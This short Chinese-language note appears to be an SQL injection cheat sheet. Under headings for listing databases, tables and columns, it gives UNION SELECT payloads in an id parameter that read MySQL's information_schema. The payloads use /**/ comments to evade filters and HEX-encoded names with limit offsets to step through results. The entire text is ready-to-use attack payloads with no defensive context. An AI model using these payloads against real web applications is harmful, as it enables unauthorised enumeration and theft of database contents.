查库

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 17(表位置),1/*

查表

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**

/TABLE_SCHEMA=库的HEX值/**/limit/**/17(表位置),1

查段

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/

TABLE_NAME=表的HEX值/**/limit/**/1,1